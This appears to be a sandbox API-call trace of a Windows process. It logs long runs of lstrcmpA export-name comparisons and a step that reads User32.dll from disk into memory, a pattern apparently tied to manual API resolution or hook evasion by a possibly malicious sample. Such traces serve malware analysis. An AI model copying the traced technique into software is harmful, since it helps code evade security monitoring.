[0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0095.045] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0095.046] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0095.046] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0095.046] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0095.046] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0095.046] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0095.046] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0095.047] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0095.047] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0095.048] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0095.048] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0095.048] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0095.048] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0095.048] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0095.048] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0095.048] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0095.049] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0095.049] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0095.049] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0095.049] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0095.049] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0095.049] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0095.049] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0095.049] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0095.049] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0095.049] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0095.049] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0095.049] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0095.060] GetProcessHeap () returned 0x570000 [0095.060] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2db5030 | out: hHeap=0x570000) returned 1 [0095.060] GetProcessHeap () returned 0x570000 [0095.060] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5891c0 [0095.060] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0095.061] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0095.061] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0095.061] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0095.061] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0095.061] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0095.061] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0095.061] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0095.061] GetProcessHeap () returned 0x570000 [0095.061] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1555b8) returned 0x417e040 [0095.065] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0095.065] ReadFile (in: hFile=0x17c, lpBuffer=0x417e040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x417e040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0095.279] CloseHandle (hObject=0x17c) returned 1 [0095.279] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0095.280] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0095.280] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0095.280] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0095.280] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0095.280] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0095.280] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0095.280] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0095.280] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0095.280] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0095.280] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0095.280] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0095.280] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0095.280] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0095.280] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0095.280] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0095.280] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0095.280] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0095.280] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0095.280] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0095.280] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0095.280] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0095.280] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0095.280] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0095.280] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0095.281] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0095.281] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0095.281] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0095.281] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0095.281] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0095.281] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0095.281] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0095.281] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0095.281] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0095.281] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0095.281] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0095.281] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0095.281] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0095.281] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0095.281] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0095.281] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0095.281] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0095.281] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0095.281] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0095.281] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0095.281] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0095.281] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0095.281] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0095.281] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0095.281] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0095.281] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0095.281] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0095.281] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0095.282] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0095.282] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0095.282] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0095.282] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0095.282] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0095.282] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0095.282] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0095.282] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0095.282] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0095.282] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0095.282] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0095.282] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0095.282] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0095.282] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0095.282] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0095.282] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0095.282] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0095.282] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0095.282] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0095.282] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0095.282] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0095.282] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0095.282] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0095.282] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0095.282] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0095.282] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0095.282] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0095.282] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0095.283] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0095.283] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0095.283] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0095.283] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0095.283] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0095.283] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0095.283] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0095.283] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0095.283] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0095.283] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0095.283] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0095.283] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0095.283] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0095.284] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0095.284] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0095.284] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0095.284] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0095.284] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0095.284] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0095.284] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0095.284] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0095.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0095.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0095.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0095.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0095.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0095.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0095.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0095.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0095.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0095.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0095.285] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0095.285] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0095.286] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0095.286] lstrcmpA 